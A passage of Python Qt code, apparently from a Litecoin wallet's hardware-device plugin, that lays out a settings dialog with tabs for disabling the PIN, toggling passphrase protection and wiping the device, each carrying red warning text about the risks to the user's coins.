settings_glayout.addWidget(timeout_minutes, 6, 4)
settings_glayout.addWidget(timeout_msg, 7, 1, 1, -1)
settings_layout.addLayout(settings_glayout)
settings_layout.addStretch(1)
# Advanced tab
advanced_tab = QWidget()
advanced_layout = QVBoxLayout(advanced_tab)
advanced_glayout = QGridLayout()
# Advanced tab - clear PIN
clear_pin_button = QPushButton(_("Disable PIN"))
clear_pin_button.clicked.connect(clear_pin)
clear_pin_warning = QLabel(
_("If you disable your PIN, anyone with physical access to your "
"%s device can spend your litecoins.") % plugin.device)
clear_pin_warning.setWordWrap(True)
clear_pin_warning.setStyleSheet("color: red")
advanced_glayout.addWidget(clear_pin_button, 0, 2)
advanced_glayout.addWidget(clear_pin_warning, 1, 0, 1, 5)
# Advanced tab - toggle passphrase protection
passphrase_button = QPushButton()
passphrase_button.clicked.connect(toggle_passphrase)
passphrase_msg = WWLabel(PASSPHRASE_HELP)
passphrase_warning = WWLabel(PASSPHRASE_NOT_PIN)
passphrase_warning.setStyleSheet("color: red")
advanced_glayout.addWidget(passphrase_button, 3, 2)
advanced_glayout.addWidget(passphrase_msg, 4, 0, 1, 5)
advanced_glayout.addWidget(passphrase_warning, 5, 0, 1, 5)
# Advanced tab - wipe device
wipe_device_button = QPushButton(_("Wipe Device"))
wipe_device_button.clicked.connect(wipe_device)
wipe_device_msg = QLabel(
_("Wipe the device, removing all data from it. The firmware "
"is left unchanged."))
wipe_device_msg.setWordWrap(True)
wipe_device_warning = QLabel(
_("Only wipe a device if you have the recovery seed written down "
"and the device wallet(s) are empty, otherwise the litecoins "
"will be lost forever."))
wipe_device_warning.setWordWrap(True)
wipe_device_warning.setStyleSheet("color: red")
advanced_glayout.addWidget(wipe_device_button, 6, 2)
advanced_glayout.addWidget(wipe_device_msg, 7, 0, 1, 5)
advanced_glayout.addWidget(wipe_device_warning, 8, 0, 1, 5)
advanced_layout.addLayout(advanced_glayout)
advanced_layout.addStretch(1)
tabs = QTabWidget(self)
tabs.addTab(info_tab, _("Information"))
tabs.addTab(settings_tab, _("Settings"))
tabs.addTab(advanced_tab, _("Advanced"))
dialog_vbox = QVBoxLayout(self)
dialog_vbox.addWidget(tabs)
dialog_vbox.addLayout(Buttons(CloseButton(self)))
# Update information
invoke_client(None)
| 41.794567 | 81 | 0.613966 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.